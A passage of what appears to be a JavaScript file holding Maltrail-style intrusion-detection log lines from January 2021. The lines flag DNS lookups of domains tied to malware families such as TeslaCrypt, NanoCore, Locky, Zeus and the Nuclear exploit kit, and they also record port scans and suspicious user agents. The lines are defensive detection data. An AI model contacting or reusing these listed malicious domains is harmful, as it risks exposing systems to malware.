    '"2021-01-11 03:16:07.213125" r2d2 2.200.107.146 49395 52.50.73.4 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:16:07.265693" r2d2 2.200.110.233 64020 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:16:43.384713" r2d2 2.200.110.232 63562 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:16:59.625368" r2d2 2.200.110.232 64265 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:16:59.627411" r2d2 2.200.107.146 10362 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:17:00.980789" r2d2 2.200.110.233 49206 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:17:34.681234" r2d2 2.200.110.233 64095 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 03:17:59.607783" r2d2 2.200.110.232 64261 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:17:54.637897" r2d2 10.1.19.42 59512 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:18:10.981071" r2d2 2.200.110.232 63676 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:18:10.983118" r2d2 2.200.107.146 49065 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:18:11.033268" r2d2 2.200.110.233 63775 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:18:33.695920" r2d2 2.200.105.226 59346 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:18:33.695926" r2d2 2.200.105.226 59346 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:18:33.726772" r2d2 2.200.105.226 60878 172.64.32.202 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:18:33.726607" r2d2 2.200.105.226 60878 172.64.32.202 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:19:18.212732" r2d2 2.200.110.232 63521 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:19:18.214331" r2d2 2.200.107.146 47396 52.58.214.33 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:19:18.240670" r2d2 2.200.110.233 63609 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:19:21.043370" r2d2 2.200.110.232 63514 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:19:21.069611" r2d2 2.200.110.233 64502 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:19:40.578820" r2d2 2.200.109.58 62736 192.5.5.241 53 UDP DNS (cci-china).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:19:40.581551" r2d2 2.200.109.58 41842 192.42.175.30 53 UDP DNS (cci-china).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:19:43.381337" r2d2 2.200.110.232 63706 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:19:43.384093" r2d2 2.200.107.146 35725 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:19:44.451985" r2d2 2.200.109.58 33399 219.138.102.194 53 UDP DNS (cci-china).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:20:15.792649" r2d2 2.200.110.232 65314 2.200.107.169 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 03:20:31.077157" r2d2 2.200.107.146 20732 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:20:31.075357" r2d2 2.200.110.232 63459 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:20:31.103432" r2d2 2.200.110.233 64433 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:20:41.212859" r2d2 10.3.160.42 30891 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:20:41.312590" r2d2 10.3.160.42 30891 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:20:41.412696" r2d2 10.3.160.42 30891 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:20:41.912855" r2d2 10.3.160.42 30891 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:20:42.312433" r2d2 10.3.160.42 30891 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:20:43.412844" r2d2 10.3.160.42 30891 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:20:59.608447" r2d2 2.200.110.232 63787 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:21:04.126337" r2d2 2.200.110.232 64998 2.200.107.169 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 03:21:25.261244" r2d2 2.200.110.232 64526 2.200.107.169 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 03:21:25.262773" r2d2 2.200.107.146 32403 178.62.208.8 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 03:21:25.840759" r2d2 2.200.110.232 49481 2.200.107.169 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 03:21:25.866686" r2d2 2.200.110.233 64560 2.200.107.168 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 03:21:41.109536" r2d2 2.200.107.146 33375 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:21:41.107326" r2d2 2.200.110.232 65416 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:21:41.136022" r2d2 2.200.110.233 65440 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:21:58.594784" r2d2 178.17.174.14 54230 2.200.109.24 80 TCP UA "Synapse (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET4.0E; SynapseWorkstation.3.2.1; .NET4.0C\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:22:11.889160" r2d2 178.17.174.14 54880 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB7.5; InfoPath.2; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:22:19.882321" r2d2 178.17.174.14 55398 2.200.109.24 80 TCP UA "Synapse (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2; SynapseWorkstation.3.2.1\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:22:43.381602" r2d2 2.200.110.232 65017 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:22:43.394962" r2d2 2.200.110.232 64745 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:22:43.394007" r2d2 2.200.110.232 49488 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:22:43.396183" r2d2 2.200.107.146 55836 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:22:47.226441" r2d2 2.200.97.1 52457 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:22:48.115436" r2d2 2.200.110.233 63606 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:22:48.184302" r2d2 2.200.110.233 64523 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 03:22:48.231190" r2d2 2.200.107.146 23070 194.146.106.22 53 UDP DNS ns1.frobbit.se "rogue dns (malicious)" (static)\n' +
    '"2021-01-11 03:22:48.350694" r2d2 2.200.110.233 63462 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:22:49.793490" r2d2 2.200.110.233 63930 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:22:51.143012" r2d2 2.200.110.233 64479 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:22:59.613352" r2d2 2.200.110.232 65376 2.200.107.169 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 03:22:59.615625" r2d2 2.200.107.146 41660 199.19.53.1 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 03:23:00.384960" r2d2 10.1.19.42 59515 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:23:32.000208" r2d2 2.200.108.59 11350,11352,11353,11356,11358,11360,11364,11365,11366,11367,11369,11372,11375,11376,11378,11383,33616,33744,34178,34544,34976,35254,35346,36588,37044,37050,37488,38488,38642,39048,39124,39134,39434,39552,42070,42074,42075,42077,42242,42730,42884,43154,43294,44778,44896,44982,45374,45516,45862,45974,47290,47840,47854,48199,48201,48204,49388,49628,50096,50334,50720,50728,51124,51506,51516,52702,53168,53296,53616,54376,54464,54832,54954,55398,55804,55946,56228,56286,56598,57846,57944,58596,59756,59982,60152,60838 77.53.81.105 21,6495,8234,8728,9564,9753,10280,13939,15022,15315,16755,18663,20709,21246,21690,21991,22328,22451,22613,22817,24157,25693,26365,29122,29161,29849,29963,30519,30814,31038,31701,32918,32988,33062,33753,34575,34894,35642,37726,39084,39260,39846,40329,42370,43906,47579,48166,48955,49294,49662,50028,50942,51980,52906,54868,55633,57310,58030,59628,60245,61771,62542,64096,64844 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:23:32.000205" r2d2 2.200.108.59 11354,11355,11357,11359,11360,11361,11362,11363,11373,11376,11379,11380,34178,34502,34976,35048,35448,35486,35986,36732,36866,36962,37050,37448,38090,38942,39014,39134,40198,40776,40976,40988,42070,42072,42073,42075,42076,42324,42730,43526,43734,44102,44310,44480,44564,44618,45974,46074,46158,46542,47082,47488,47762,47854,47940,48200,48201,48202,48203,49472,49526,49628,50182,50334,50522,51124,51590,51604,51640,53616,54832,55226,55704,55804,55860,55946,56020,56066,56228,57846,57924,58596,58942,59262,59454,59756,60268,60342,60652,60782 77.53.81.105 21,6495,6679,6702,7703,8679,9213,9564,9682,12832,13386,13922,13939,14454,15238,15977,16575,17696,17848,18610,21478,22240,24157,24285,24913,25725,26244,26492,26807,27652,28773,29122,29427,29495,31644,31701,31749,32918,34894,37518,37726,38387,38918,39394,39934,40275,40329,41033,41055,41991,47359,49294,49662,49722,50789,50942,51980,52344,52380,53097,54868,58272,60245,60620,61771,61786,64096,64556,64803,65223 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:23:32.000285" r2d2 2.200.108.59 11351,11352,11355,11357,11358,11363,11365,11366,11371,11379,11382,32958,33194,33616,33744,34544,35048,35230,35254,35346,35448,35486,35986,36838,36962,37044,37448,37476,37488,38090,38488,38942,38998,39124,39434,40370,40776,40976,42071,42072,42077,42242,42324,42722,43154,43526,43982,44102,44896,44982,45374,45862,46542,47082,47840,47940,48094,48199,48202,48204,48206,49472,49526,49774,50182,50720,50728,51498,51506,51956,52702,53218,53296,53568,54954,55226,55810,55860,56286,56598,59262,59384,59454,59950,59982,60102,60152,60268,60342,60782 77.53.81.105 21,7703,8679,9213,9682,9753,10280,12832,13117,13922,14064,15022,15238,15977,16235,16575,17696,18663,21246,21690,21991,22328,25693,25725,26069,26365,26492,26807,28773,29161,29849,30519,31749,32988,33062,33770,35642,37518,38073,39260,39846,39934,40152,40275,41055,41734,41991,43201,44239,46083,47359,47579,48166,48955,49722,50028,51058,52311,52344,52906,53097,53309,55367,58030,59628,59725,60657,60770,61602,61786,62542,64556,64844 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:23:57.731897" r2d2 2.200.110.232 64093 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:23:57.762752" r2d2 2.200.110.233 65033 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:23:58.114724" r2d2 2.200.110.233 64265 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:23:59.003594" r2d2 2.200.110.233 64776 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 03:23:59.607967" r2d2 2.200.110.232 64460 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:23:59.623034" r2d2 2.200.110.232 64483 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:23:59.624985" r2d2 2.200.107.146 4980 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:24:01.144359" r2d2 2.200.110.233 65133 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:24:01.983473" r2d2 2.200.110.233 63970 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:24:05.641331" r2d2 2.200.110.233 63970 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:24:07.501167" r2d2 2.200.110.233 63606 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 03:24:41.593621" r2d2 10.3.160.42 30893 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:24:41.692492" r2d2 10.3.160.42 30893 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:24:41.791948" r2d2 10.3.160.42 30893 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:24:42.692526" r2d2 10.3.160.42 30893 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:24:43.394599" r2d2 2.200.110.232 65093 2.200.107.169 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:24:43.396456" r2d2 2.200.107.146 60382 194.169.218.42 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:24:51.199039" r2d2 2.200.105.226 58543 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:24:51.198987" r2d2 2.200.105.226 58543 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:24:51.198982" r2d2 2.200.105.226 58543 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:24:59.626882" r2d2 2.200.110.232 64729 2.200.107.169 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 03:24:59.629146" r2d2 2.200.107.146 55438 192.55.83.30 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 03:25:10.145455" r2d2 2.200.110.233 64388 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:25:10.147433" r2d2 2.200.107.146 46739 200.7.5.14 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:25:11.144399" r2d2 2.200.110.232 63727 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:25:11.168083" r2d2 2.200.110.233 64616 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:25:32.534165" r2d2 178.17.174.14 43874 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/5.0 \\(compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAAU; FunWebProducts; yie10\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:25:43.382951" r2d2 2.200.110.232 49440 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:25:59.620698" r2d2 2.200.110.232 65142 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:25:59.622347" r2d2 2.200.107.146 2759 52.50.73.4 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:25:59.624677" r2d2 2.200.110.232 63524 2.200.107.169 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:25:59.632254" r2d2 2.200.107.146 35810 78.47.109.127 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:26:17.715417" r2d2 2.200.110.232 65304 2.200.107.169 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:26:17.717084" r2d2 2.200.107.146 4878 194.169.218.42 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:26:17.856240" r2d2 2.200.110.232 64238 2.200.107.169 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 03:26:17.876411" r2d2 2.200.110.232 63785 2.200.107.169 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:26:17.878612" r2d2 2.200.107.146 29520 192.48.79.30 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:26:17.885880" r2d2 2.200.110.233 63280 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 03:26:17.896178" r2d2 2.200.110.232 65186 2.200.107.169 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:26:17.897382" r2d2 2.200.107.146 23253 192.41.162.30 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:26:17.906234" r2d2 2.200.110.232 64769 2.200.107.169 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:26:17.940740" r2d2 2.200.110.233 65533 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:26:17.940727" r2d2 2.200.110.233 65138 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:26:18.136776" r2d2 2.200.110.232 63639 2.200.107.169 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:26:18.146413" r2d2 2.200.110.232 65376 2.200.107.169 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:26:18.233212" r2d2 2.200.110.232 63935 2.200.107.169 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 03:26:18.379498" r2d2 2.200.110.233 64574 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:26:19.075755" r2d2 2.200.110.232 64672 2.200.107.169 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 03:26:20.366632" r2d2 2.200.110.232 64925 2.200.107.169 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:26:20.406423" r2d2 2.200.110.232 63389 2.200.107.169 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:26:21.168075" r2d2 2.200.107.146 28690 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:26:21.165888" r2d2 2.200.110.232 65064 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:26:21.192758" r2d2 2.200.110.233 64296 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:26:18.488702" r2d2 10.1.19.42 59527 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:26:41.782787" r2d2 10.3.160.42 30894 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:26:41.887739" r2d2 10.3.160.42 30894 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:26:41.981897" r2d2 10.3.160.42 30894 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:26:42.185523" r2d2 10.3.160.42 30894 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:26:42.482182" r2d2 10.3.160.42 30894 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:26:59.608234" r2d2 2.200.110.232 65327 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:27:04.146713" r2d2 178.17.174.14 53460 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; iebar; FunWebProducts; .NET CLR 1.1.4322; AskTbPGL/5.13.2.19379; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:27:04.146710" r2d2 178.17.174.14 53460 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; iebar; FunWebProducts; .NET CLR 1.1.4322; AskTbPGL/5.13.2.19379; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:27:26.875878" r2d2 2.200.110.232 63685 2.200.107.169 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:27:26.902070" r2d2 2.200.110.233 64905 2.200.107.168 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:27:26.877520" r2d2 2.200.107.146 22598 108.162.193.92 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:27:27.321714" r2d2 2.200.110.232 65039 2.200.107.169 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:27:31.198287" r2d2 2.200.110.232 65412 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:27:31.226717" r2d2 2.200.110.233 49309 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:27:31.016049" r2d2 178.17.174.14 55416 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/5.0 \\(compatible; MSIE 9.0; Windows NT 6.0; FunWebProducts; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:27:35.998917" r2d2 10.1.19.42 59532 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:28:37.744761" r2d2 2.200.110.232 64756 2.200.107.169 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 03:28:37.746217" r2d2 2.200.107.146 20541 37.209.196.12 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 03:28:37.752952" r2d2 2.200.110.233 64488 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:28:37.770956" r2d2 2.200.110.233 63572 2.200.107.168 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 03:28:37.942284" r2d2 2.200.110.233 65460 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:28:41.249831" r2d2 2.200.110.232 63545 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:28:41.290962" r2d2 2.200.110.233 65094 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:28:43.385890" r2d2 2.200.110.232 64930 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:28:59.256231" r2d2 2.200.107.146 31121 198.51.44.67 53 UDP DNS (td-username-db4-63-97).wix.com "free web hosting (suspicious)" (static)\n' +
    '"2021-01-11 03:28:59.254626" r2d2 2.200.110.232 63931 2.200.107.169 53 UDP DNS (td-username-db4-63-97).wix.com "free web hosting (suspicious)" (static)\n' +
    '"2021-01-11 03:29:02.314249" r2d2 2.200.110.232 65533 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:29:02.316937" r2d2 2.200.107.146 22495 52.57.28.60 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:29:02.402137" r2d2 2.200.110.233 63522 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:29:37.415329" r2d2 2.200.110.233 65018 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 03:29:43.401627" r2d2 2.200.110.232 63926 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:29:43.404097" r2d2 2.200.107.146 41593 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:29:51.294551" r2d2 2.200.110.233 63398 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:29:59.611197" r2d2 2.200.110.232 49483 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:30:01.551050" r2d2 2.200.109.58 63730 193.232.142.17 53 UDP DNS (nnov).su "domain (suspicious)" (static)\n' +
